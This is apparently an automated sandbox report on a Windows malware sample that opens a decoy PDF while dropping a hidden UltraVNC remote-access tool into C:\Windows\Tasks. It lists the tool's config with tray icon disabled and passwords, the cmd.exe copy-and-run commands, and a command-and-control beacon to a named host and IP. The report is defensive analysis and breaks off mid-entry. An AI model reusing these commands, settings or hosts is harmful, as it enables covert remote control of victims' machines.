                                                                  Encrypted:false
                                                                  SSDEEP:12288:A9bEzJrWWXvkqWpnMs6LQ1BU9U0pGOdbLL23yKBcPr:AFEzJrZXvkqYgUwuCUcPr
                                                                  MD5:A18D0E3EEEF0D6E099BAB52F8B041446
                                                                  SHA1:4879750BEC07AA11629950310AF538E9A9D91D20
                                                                  SHA-256:95F656B24E7D5E192BF4EA8216CCB539299EE908A3E998FCEE4B1A655BAF66EF
                                                                  SHA-512:6E2C2D96C98EE24AC6235B35131889D338ABC5E8399A41204AB2DFCFF56E40ABF6476A3F080A0F12715F8A6685182258EA6183645FD8D337B7F09EE14295FBAD
                                                                  Malicious:false
                                                                  Preview:%PDF-1.5.%.....92 0 obj.<</Filter/FlateDecode/Length 3501>>.stream.x..Zmo...>..EA.,..(J.s~..S+.v..^.b.....4...Ea.I..m.4_..;......%0p:......3.......?..w........&/../.........=...en......?...../..m._..v.}T..l..?..g...l.7.A....Nq..z.m..c..Nv...<.........3...s4.C..C...f.....l.0...-.-8...~.c.yi.`y..]...uf.)K.x...1T...Iw...5D..iE.v.a5.t..h.3Z.@..XRgXR..4....A.....a..C.)n.E%...g....d....T.$..?..`Z.>...F....:.aT8].k:|...v.....=+}..O..A.a..z6.D.SU.]'"=.f2...1....`.}R.#.R.4.....<$......Z..agQ....u....V.$~.z5*.?.r.).......'.p..6...l..#~...}....c.8k{/$.Z8G....:..5A.T......M....b.M..._.FE.}.5.........;...e.....j.......E...4...'E.e'..>....u..v...l..?..u.x......_"..-.9.CX.3.#...=....;.......b.j........j*$Y..G......./,..Rh.....m...'9..V.....e.".....Y.{...?g.bi..*...T..0!.k.8q......)...xN{..g.`G..F.0.n~.U!.a..(.!..^...[.d'.?fw....x.h...[.:.*-..#;.lM@.c.+x1......nFK...].>..n@,H..-.C ........*zf.Z.0W-.....5#]...C..8.Pm1Q.8...5.,. ....Ce=....p.5.u!.e.....Q).=.G.

                                                                  C:\Windows\Tasks\sync_browser.exe

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1945368
                                                                  Entropy (8bit):6.532894678367002
                                                                  Encrypted:false
                                                                  SSDEEP:24576:7x+OMUhcLEQ6EIN1sz4LD7hKCt+/WppxJ1Rj0rPz3AUA/Jpu:FQXL0d7hdrr0rPz3AUA/J0
                                                                  MD5:749B3A68B9C5325D592822EE7C2C17EC
                                                                  SHA1:3EDE6BB2DF969432358A5883CF226971FDE8B7D4
                                                                  SHA-256:F7D4080AD8259B0AAC2504F8B5D8FAB18E5124321C442C8BCB577598059D0B24
                                                                  SHA-512:B9C5AE6BA6145048721F6B4D5D9D751E7F0E6945D4D72FDB7959AED11BFC24ABDDBDF02A55A19FDD990648CAA6710ACAE9488329CBE3ABBC808C704954948998
                                                                  Malicious:true
                                                                  Yara Hits:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: C:\Windows\Tasks\sync_browser.exe, Author: Joe Security
                                                                  Antivirus:
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......r.l.6...6...6.......8...-U......-U..8...-U..r...6...9...?...4...?...7...?...!...6.......-U......-U..7...-U..7...Rich6...........................PE..d....Y,T.........."......|..........4..........@..............................(.....0.....@.............................................................t.......$.............(.........................................................(............................text....{.......|.................. ..`.rdata..,?.......@..................@..@.data....6.......D..................@....pdata..$...........................@..@.rsrc...t...........................@..@.reloc...$....(..&...p..............@..B................................................................................................................................................................................................................................

                                                                  C:\Windows\Tasks\wFUH4p.aEmode

                                                                  Download File
                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                  File Type:Generic INItialization configuration [admin]
                                                                  Category:dropped
                                                                  Size (bytes):858
                                                                  Entropy (8bit):5.216893826927931
                                                                  Encrypted:false
                                                                  SSDEEP:24:z/h28nCt2vMQg9KgJhuXNTxYgMei3MAKJDv:rh28nCF/KgJOr8eTxDv
                                                                  MD5:7EB58E0D2316B8ECE029C804BF4BA8FA
                                                                  SHA1:A2A8E2518D12A53CCFCAB925C124933172044D08
                                                                  SHA-256:71203DB9D1722FA5B1B627BAA36FEAFC93B1E5F2F779413C84BD4686742A76F9
                                                                  SHA-512:3415113B8CA2F79860DF7529CFBC18CBDC24B93B22723B9D34034A683B71906F8DCC20AA568ADF3F4649EB85FD7E8FDF8FDB34FE5A748E4AE7E36ACD2FC063AD
                                                                  Malicious:false
                                                                  Preview:[Permissions]..[admin]..LocalInputsDisabled=0..IdleTimeout=0..EnableJapInput=0..RemoveAero=0..DebugMode=0..Avilog=0..path=Y:..DebugLevel=0..AllowLoopback=0..LoopbackOnly=0..AllowShutdown=1..AllowProperties=1..AllowEditClients=1..FileTransferTimeout=40..KeepAliveInterval=4..SocketKeepAliveTimeout=14000..DisableTrayIcon=1..MSLogonRequired=0..NewMSLogon=0..ConnectPriority=0..QuerySetting=2..QueryTimeout=8..QueryAccept=0..LockSetting=0..RemoveWallpaper=0..RemoveEffects=0..RemoveFontSmoothing=0..FileTransferEnabled=1..FTUserImpersonation=1..BlankMonitorEnabled=0..BlankInputsOnly=0..DefaultScale=1..UseDSMPlugin=0..DSMPlugin=..DSMPluginConfig=..primary=1..secondary=0..SocketConnect=0..HTTPConnect=0..XDMCPConnect=0..AutoPortSelect=1..PortNumber=5628..HTTPPortNumber=5800..InputsEnabled=1..[UltraVNC]..passwd=F0111C75FCAEB30BD2..passwd2=F2102C75FCAEB11BD2..

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.952472042394955
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:7q551ugrWe.exe
                                                                  File size:1'664'495 bytes
                                                                  MD5:d61940626fad051067bfd16f2ab4e657
                                                                  SHA1:cceaeda73fca724016bac0c9cb000fcd4ca1e523
                                                                  SHA256:c87a78b708bb877d946fba1a78d28a7b16c0f411e9fd8380cf2be738a2f327a4
                                                                  SHA512:ca97c277acda035354e904e72dd9ab52547eec12f42cd3de5acd075e4af9785a807dfacfdfb65ffd43d88ee31eabc28d572a83d0599701fe7a1aa36bbd09f869
                                                                  SSDEEP:24576:WKWs4sgeV+OkCbkE/ClHrI3phRLFry+IVGjZP7gzF77/voe2D7UGxxy+vJy:TFFV+SbkE/yHkPRd4iazZoe2DNm
                                                                  TLSH:A1752351B6D3D8F4DA57227111B1AD132F63DD2A164128CF738DFA067A30683F92BA72
                                                                  File Content Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...-..P.................2...H....../8.......P....@.........................................................................$s.............................

                                                                  File Icon

                                                                  Icon Hash:357561d6dad24d55

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x41382f
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                  DLL Characteristics:
                                                                  Time Stamp:0x50E0002D [Sun Dec 30 08:49:49 2012 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:1d1577d864d2da06952f7affd8635371

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push FFFFFFFFh
                                                                  push 00416E98h
                                                                  push 004139C0h
                                                                  mov eax, dword ptr fs:[00000000h]
                                                                  push eax
                                                                  mov dword ptr fs:[00000000h], esp
                                                                  sub esp, 68h
                                                                  push ebx
                                                                  push esi
                                                                  push edi
                                                                  mov dword ptr [ebp-18h], esp
                                                                  xor ebx, ebx
                                                                  mov dword ptr [ebp-04h], ebx
                                                                  push 00000002h
                                                                  call dword ptr [004151DCh]
                                                                  pop ecx
                                                                  or dword ptr [0041B9E4h], FFFFFFFFh
                                                                  or dword ptr [0041B9E8h], FFFFFFFFh
                                                                  call dword ptr [004151E0h]
                                                                  mov ecx, dword ptr [004199C4h]
                                                                  mov dword ptr [eax], ecx
                                                                  call dword ptr [004151E4h]
                                                                  mov ecx, dword ptr [004199C0h]
                                                                  mov dword ptr [eax], ecx
                                                                  mov eax, dword ptr [004151E8h]
                                                                  mov eax, dword ptr [eax]
                                                                  mov dword ptr [0041B9E0h], eax
                                                                  call 00007FE541609D52h
                                                                  cmp dword ptr [00419780h], ebx
                                                                  jne 00007FE541609C3Eh
                                                                  push 004139B8h
                                                                  call dword ptr [004151ECh]
                                                                  pop ecx
                                                                  call 00007FE541609D24h
                                                                  push 00419050h
                                                                  push 0041904Ch
                                                                  call 00007FE541609D0Fh
                                                                  mov eax, dword ptr [004199BCh]
                                                                  mov dword ptr [ebp-6Ch], eax
                                                                  lea eax, dword ptr [ebp-6Ch]
                                                                  push eax
                                                                  push dword ptr [004199B8h]
                                                                  lea eax, dword ptr [ebp-64h]
                                                                  push eax
                                                                  lea eax, dword ptr [ebp-70h]
                                                                  push eax
                                                                  lea eax, dword ptr [ebp-60h]
                                                                  push eax
                                                                  call dword ptr [004151F4h]
                                                                  push 00419048h
                                                                  push 00419000h
                                                                  call 00007FE541609CDCh

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x173240xc8.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c0000x309f0.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x150000x364.rdata
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x10000x130f00x13200a86014994324ad6f47bddf386fd89176False0.6081495098039216data6.614408281478693IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rdata0x150000x35600x36009abc217bd20b39b1db2f57ddf9bc789cFalse0.4381510416666667data5.5938980842785995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .data0x190000x29ec0x8004c129856aeef51c872b4a2f6db01e9bdFalse0.44580078125data3.8126171673069433IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                  .rsrc0x1c0000x309f00x30a0032c6714aa776c8352eda97e813ef0b21False0.7375381587403599data7.293326377493547IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                  RT_ICON0x1c2800x18dePNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedRussianRussia0.9696826892868363
                                                                  RT_ICON0x1db600x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896RussianRussia0.08974964572508266
                                                                  RT_ICON0x21d880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600RussianRussia0.12935684647302906
                                                                  RT_ICON0x243300x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 6720RussianRussia0.16553254437869822
                                                                  RT_ICON0x25d980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224RussianRussia0.21106941838649157
                                                                  RT_ICON0x26e400x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400RussianRussia0.29508196721311475
                                                                  RT_ICON0x277c80x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 1680RussianRussia0.33313953488372094
                                                                  RT_ICON0x27e800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088RussianRussia0.4592198581560284
                                                                  RT_GROUP_ICON0x282e80x76dataRussianRussia0.7457627118644068
                                                                  RT_VERSION0x283600x350data0.4693396226415094
                                                                  RT_MANIFEST0x286b00x33cASCII text, with CRLF line terminatorsEnglishUnited States0.501207729468599

                                                                  Imports

                                                                  DLLImport
                                                                  COMCTL32.dll
                                                                  SHELL32.dllSHGetSpecialFolderPathW, ShellExecuteW, SHGetMalloc, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteExW
                                                                  GDI32.dllCreateCompatibleDC, CreateFontIndirectW, DeleteObject, DeleteDC, GetCurrentObject, StretchBlt, GetDeviceCaps, CreateCompatibleBitmap, SelectObject, SetStretchBltMode, GetObjectW
                                                                  ADVAPI32.dllFreeSid, AllocateAndInitializeSid, CheckTokenMembership
                                                                  USER32.dllGetMenu, SetWindowPos, GetWindowDC, ReleaseDC, CopyImage, GetKeyState, GetWindowRect, ScreenToClient, GetWindowLongW, SetTimer, GetMessageW, DispatchMessageW, KillTimer, DestroyWindow, EndDialog, SendMessageW, wsprintfW, GetClassNameA, GetWindowTextW, GetWindowTextLengthW, GetSysColor, wsprintfA, SetWindowTextW, CreateWindowExW, GetDlgItem, GetClientRect, SetWindowLongW, UnhookWindowsHookEx, SetFocus, GetSystemMetrics, SystemParametersInfoW, ShowWindow, DrawTextW, GetDC, ClientToScreen, GetWindow, DialogBoxIndirectParamW, DrawIconEx, CallWindowProcW, DefWindowProcW, CallNextHookEx, PtInRect, SetWindowsHookExW, LoadImageW, LoadIconW, MessageBeep, EnableWindow, IsWindow, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, MessageBoxA, GetParent
                                                                  ole32.dllCreateStreamOnHGlobal, CoCreateInstance, CoInitialize
                                                                  OLEAUT32.dllSysAllocString, VariantClear, OleLoadPicture
                                                                  KERNEL32.dllSetFileTime, SetEndOfFile, EnterCriticalSection, DeleteCriticalSection, GetModuleHandleA, LeaveCriticalSection, WaitForMultipleObjects, ReadFile, SetFilePointer, GetFileSize, FormatMessageW, lstrcpyW, LocalFree, IsBadReadPtr, GetSystemDirectoryW, GetCurrentThreadId, SuspendThread, TerminateThread, InitializeCriticalSection, ResetEvent, SetEvent, CreateEventW, GetVersionExW, GetModuleFileNameW, GetCurrentProcess, SetProcessWorkingSetSize, SetCurrentDirectoryW, GetDriveTypeW, CreateFileW, GetCommandLineW, GetStartupInfoW, CreateProcessW, CreateJobObjectW, ResumeThread, AssignProcessToJobObject, CreateIoCompletionPort, SetInformationJobObject, GetQueuedCompletionStatus, GetExitCodeProcess, CloseHandle, SetEnvironmentVariableW, GetTempPathW, GetSystemTimeAsFileTime, lstrlenW, CompareFileTime, SetThreadLocale, FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, RemoveDirectoryW, ExpandEnvironmentStringsW, WideCharToMultiByte, VirtualAlloc, GlobalMemoryStatusEx, lstrcmpW, GetEnvironmentVariableW, lstrcmpiW, lstrlenA, GetLocaleInfoW, MultiByteToWideChar, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetSystemDefaultLCID, lstrcmpiA, GlobalAlloc, GlobalFree, MulDiv, FindResourceExA, SizeofResource, LoadResource, LockResource, LoadLibraryA, ExitProcess, lstrcatW, GetDiskFreeSpaceExW, SetFileAttributesW, SetLastError, Sleep, GetExitCodeThread, WaitForSingleObject, CreateThread, GetLastError, SystemTimeToFileTime, GetLocalTime, GetFileAttributesW, CreateDirectoryW, WriteFile, GetStdHandle, VirtualFree, GetModuleHandleW, GetProcAddress, GetStartupInfoA
                                                                  MSVCRT.dll??3@YAXPAX@Z, ??2@YAPAXI@Z, memcmp, free, memcpy, _controlfp, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, ??1type_info@@UAE@XZ, _onexit, __dllonexit, _CxxThrowException, _beginthreadex, _EH_prolog, ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z, memset, _wcsnicmp, strncmp, wcsncmp, malloc, memmove, _wtol, _purecall

                                                                  Possible Origin

                                                                  Language of compilation systemCountry where language is spokenMap
                                                                  RussianRussia
                                                                  EnglishUnited States

                                                                  Network Behavior

                                                                  Suricata IDS Alerts

                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                  2024-12-23T13:31:29.416752+01002035893ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon1192.168.2.549995194.190.152.201443TCP

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 23, 2024 13:29:25.698333979 CET49732443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:29:25.698395967 CET44349732194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:29:25.698508978 CET49732443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:29:25.701783895 CET49732443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:29:25.701812983 CET44349732194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:29:25.701863050 CET44349732194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:29:26.066232920 CET49733443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:29:26.066351891 CET44349733194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:29:26.066472054 CET49733443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:29:26.066684961 CET49733443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:29:26.066720963 CET44349733194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:29:26.066822052 CET44349733194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:29:37.491010904 CET49767443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:29:37.491040945 CET44349767194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:29:37.491184950 CET49767443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:29:37.491295099 CET49767443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:29:37.491306067 CET44349767194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:29:37.491354942 CET44349767194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:30:00.052040100 CET49817443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:30:00.052083015 CET44349817194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:30:00.052166939 CET49817443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:30:00.052311897 CET49817443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:30:00.052326918 CET44349817194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:30:00.052365065 CET44349817194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:30:38.747237921 CET49900443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:30:38.747277975 CET44349900194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:30:38.747376919 CET49900443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:30:38.747534037 CET49900443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:30:38.747550011 CET44349900194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:30:38.747603893 CET44349900194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:31:29.413110018 CET49995443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:31:29.413145065 CET44349995194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:31:29.413346052 CET49995443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:31:29.415520906 CET49995443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:31:29.415534973 CET44349995194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:31:29.415570974 CET44349995194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:31:29.416752100 CET49995443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:31:29.416760921 CET44349995194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:32:26.032320023 CET49996443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:32:26.032458067 CET44349996194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:32:26.032573938 CET49996443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:32:26.032876015 CET49996443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:32:26.032915115 CET44349996194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:32:26.032969952 CET44349996194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:33:41.069360971 CET49997443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:33:41.069408894 CET44349997194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:33:41.073542118 CET49997443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:33:41.073542118 CET49997443192.168.2.5194.190.152.201
                                                                  Dec 23, 2024 13:33:41.073586941 CET44349997194.190.152.201192.168.2.5
                                                                  Dec 23, 2024 13:33:41.073776007 CET44349997194.190.152.201192.168.2.5

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Dec 23, 2024 13:29:19.946660042 CET5196253192.168.2.51.1.1.1
                                                                  Dec 23, 2024 13:29:25.092390060 CET4973953192.168.2.51.1.1.1
                                                                  Dec 23, 2024 13:29:25.513472080 CET53497391.1.1.1192.168.2.5

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Dec 23, 2024 13:29:19.946660042 CET192.168.2.51.1.1.10x12feStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                  Dec 23, 2024 13:29:25.092390060 CET192.168.2.51.1.1.10xd2a9Standard query (0)tbdcic.infoA (IP address)IN (0x0001)false

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Dec 23, 2024 13:29:20.087773085 CET1.1.1.1192.168.2.50x12feNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                  Dec 23, 2024 13:29:21.908349037 CET1.1.1.1192.168.2.50xe2adNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                  Dec 23, 2024 13:29:21.908349037 CET1.1.1.1192.168.2.50xe2adNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                  Dec 23, 2024 13:29:25.513472080 CET1.1.1.1192.168.2.50xd2a9No error (0)tbdcic.info194.190.152.201A (IP address)IN (0x0001)false

                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:07:29:06
                                                                  Start date:23/12/2024
                                                                  Path:C:\Users\user\Desktop\7q551ugrWe.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\7q551ugrWe.exe"
                                                                  Imagebase:0x400000
                                                                  File size:1'664'495 bytes
                                                                  MD5 hash:D61940626FAD051067BFD16F2AB4E657
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2108953574.000000000266B000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2108665384.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_UltraVNC, Description: Yara detected UltraVNC Hacktool, Source: 00000000.00000003.2108665384.0000000002684000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:2
                                                                  Start time:07:29:07
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:07:29:07
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:07:29:07
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 0271695705143540 0271695705143540.cmd
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:07:29:07
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:07:29:07
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 0271695705143540.cmd
                                                                  Imagebase:0x790000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:7
                                                                  Start time:07:29:08
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6d64d0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:8
                                                                  Start time:07:29:08
                                                                  Start date:23/12/2024
                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:timeout /t 1
                                                                  Imagebase:0xac0000
                                                                  File size:25'088 bytes
                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:9
                                                                  Start time:07:29:09
                                                                  Start date:23/12/2024
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"
                                                                  Imagebase:0x7ff686a00000
                                                                  File size:5'641'176 bytes
